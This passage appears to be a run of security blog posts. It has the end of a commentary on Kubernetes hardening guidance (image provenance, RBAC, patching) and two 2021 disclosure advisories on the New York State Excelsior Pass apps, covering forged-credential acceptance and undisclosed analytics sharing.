Most Kubernetes clusters can be reconfigured to require only local images, but if you decide to enable such restrictions, performing updates will become much more difficult. Given the update cadence of Kubernetes, increasing upgrade friction may not be something you want, leading to the old tradeoff of usability vs security. On the other hand, always pulling the latest version of an external dependency without performing any validation and security testing may open an organisation to supply-chain compromise. The likelihood of this varies, as some repositories will be better monitored and are less likely to be compromised in the first place, but it’s still something to consider.

Container signing is still very much not a solved problem. Historically, Docker Content Trust was viewed as the best option where it was enabled, but that mechanism was not without its problems and is no longer maintained. Several solutions are being worked on, including sigstore.

As well as verifying that your external dependencies are legitimate and not altered from the original packages, these containers may contain security vulnerabilities. At the time of writing, the image k8s.gcr.io/etcd:3.5.0-0 (the newest version packaged for Kubernetes) contains packages vulnerable to CVE-2020-29652, which shows as a high-risk vulnerability when scanned with an image scanner like Trivy or Clair. Again, you could probably take on the task of patching these images, but that leads to further problems: do you want to be responsible for all the testing that patching will require, and what will you do when images contain vulnerabilities for which no patch exists?

RBAC is hard

Kubernetes RBAC is a difficult thing to configure well, and on engagements we regularly see customers whose RBAC configuration allows users or attackers to escalate their privileges, often to the point of gaining full administrative control over the cluster. Plenty of guidance is available on the internet on how to configure Kubernetes RBAC securely, and that goes well beyond the scope of this post.

Patching Everything is hard

This post has already discussed the difficulties of keeping the software shipped in containers up to date, but patching the worker nodes themselves is equally important. Unless you’re running a cluster backed by something like AWS’ Fargate, containers are still running on a computer that you need to keep updated. Vulnerabilities have historically been identified in every step of the execution chain, from Kubernetes to containerd to runc and the Linux kernel. Keeping all of these components updated can be challenging, especially as there’s always the chance of breaking changes and requirements for downtime.

This is something that Kubernetes can help with, as the whole concept of orchestration is intended to keep services running even as nodes go on and offline. Despite this, we still regularly see customers running nodes that haven’t had patches applied in several months, or even years. (As a tip, server uptime isn’t a badge of honour as much as it used to be; it’s more likely indicative that you’re running an outdated kernel).

Closing Thoughts

The advice issued in this NSA/CISA document has a solid technical grounding and should generally be followed, but some aspects are outdated or are missing some key context. This is almost always the case with anything in Kubernetes given the rapid development pace at which the project is still working. As with any technical security guidance, documents such as this CTR should be taken as guidance and reviewed with suitable levels of business/security context, because when it comes to container security, one size definitely does not fit all.

Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://play.google.com/store/apps/details?id=gov.ny.its.healthpassport.wallet
Versions affected: 1.2.0
Systems Affected: Android Google Play Store
Author: Siddarth Adukia sid.adukia[at]nccgroup[dot]com

Summary

New York State developed an application called NYS Excelsior Pass Wallet that allows users to acquire and store a COVID-19 vaccine credential. During some research it was discovered that this application does not validate vaccine credentials added to it, allowing forged credentials to be stored by users.

Impact

This issue would allow an individual to create and store fake vaccine credentials in their NYS Excelsior Pass Wallet that might allow them to gain access to physical spaces (such as businesses and event venues) where they would not be allowed without a vaccine credential, even when they have not received a COVID-19 vaccine.

Details

The Wallet application can add a pass directly by interacting with the NYS servers, or through scanning a QR code or photo. In neither case is the credential verified, allowing forged credentials to be added to the Wallet. Screenshots of forged credentials are included; these may be scanned by the Wallet app and added as a legitimate pass.

If a business does not properly use the NYS Scanner application, or ignores the invalid pass warning in the Scanner app and trusts the pass shown in the Excelsior Wallet app on a user’s smartphone, it could allow individuals to fake vaccine credentials and gain access to physical spaces that are only supposed to be accessible to those with valid, legitimate proof of vaccination.

Fix from Vendor

Vendor informed NCC Group they intend to implement verification for vaccine credentials added to the NYS Excelsior Pass Wallet. This fix was released in the August 20 2021 version of the app.

Recommendation to Users

Update to the latest version of the application.

Users of the NYS Excelsior Pass Scanner (such as businesses and event venues) should take care while scanning presented vaccine credentials to confirm that each credential is successfully validated by the Scanner application and is therefore legitimate.

Vendor Communication

2021-04-30 NCC Group starts disclosure to NYS via support form - no response
2021-06-07 NCC Group submits another request to coordinate a disclosure - no response
2021-06-10 NCC Group calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 NCC Group emails DOH requesting to start disclosure process - no response
2021-06-25 NCC Group emails DOH to follow up on previous email - no response
2021-07-08 NCC Group emails DOH and requests acknowledgment - no response 
2021-07-16 NCC Group emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 NYS ITS sets up meeting to discuss vulnerabilities
2021-07-21 NCC Group meets with NYS ITS team and shares vulnerabilities and recommends fixes
2021-07-21 NYS ITS sends email with patch details and date 
2021-08-20 Patch released
2021-09-01 Advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2021-09-01

Written by:  Siddarth Adukia

[Editor’s note: The disclosure timeline on this post was updated September 2 2021 to correct the patch date which was incorrectly noted in the original post. This was also corrected in the “Fix from Vendor” section. The issue was patched on August 20 2021; the original advisory had stated that it was August 12 2021]

Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://covid19vaccine.health.ny.gov/excelsior-pass
Versions affected: iOS 1.4.1, Android 1.4.1
Systems Affected: iOS, Android
Author: Dan Hastings dan.hastings[at]nccgroup[dot]trust
Advisory URL / CVE Identifier:
Risk: Information Leakage

Summary

The New York State (NYS) Excelsior scanner app is used by businesses or event venues to scan the QR codes contained in the NYS Excelsior wallet app to verify that an individual has either a negative COVID-19 test or their vaccination status. We have found that some data about the businesses/event venues using the app to scan QR codes is also sent to a third-party analytics domain, but that this was not specified in the app’s privacy policy.

Impact

The NYS scanner app’s privacy policy does not match the actual data collection practices of the application, resulting in data being sent to an analytics third party that was not specified in advance to users of this app.

Details

The NYS Excelsior scanner privacy policy (https://epass.ny.gov/privacy-scanner) describes that the Business Name, Industry Type and Zip Code are all collected by the scanner app. The policy also states in the “How Data is Used” clause that “App data, including Business Name, Industry Type, Zip Code, Pass type (vaccination, PCR, antigen), and Scan Result (valid, invalid, expired, pass not found), is collected and stored securely and is only shared with NYS”.

In a request to the domain https://app-measurement.com (which is used for Google Analytics) the Business Name, Industry Type and Zip Code of the business/event venue using the scanner are all sent, which was not specified in the app’s privacy policy.

Fix from Vendor

Vendor informed NCC Group that updates will be made to the privacy policy to clarify that Business Name, Industry Type and Zip Code data will be shared with third parties.

Recommendation to Scanner App Users

Update to the latest version of the application.

Vendor Communication

2021-04-30 Starts disclosure to NYS via support form - no response
2021-06-07 Submits another request to coordinate a disclosure - no response
2021-06-10 Calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 Emails DOH requesting to start disclosure process - no response
2021-06-25 Emails DOH to follow up on previous email - no response
2021-07-08 Emails DOH and requests acknowledgment - no response 
2021-07-16 Emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 ITS sets up meeting to discuss vulnerabilities
2021-07-21 Meets with ITS team and shares vulnerabilities and recommends fixes
2021-07-21 ITS sends email with patch details and date 
2021-08-12 Patch released
2021-09-01 Advisory publication 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-09-01

Written by: Dan Hastings
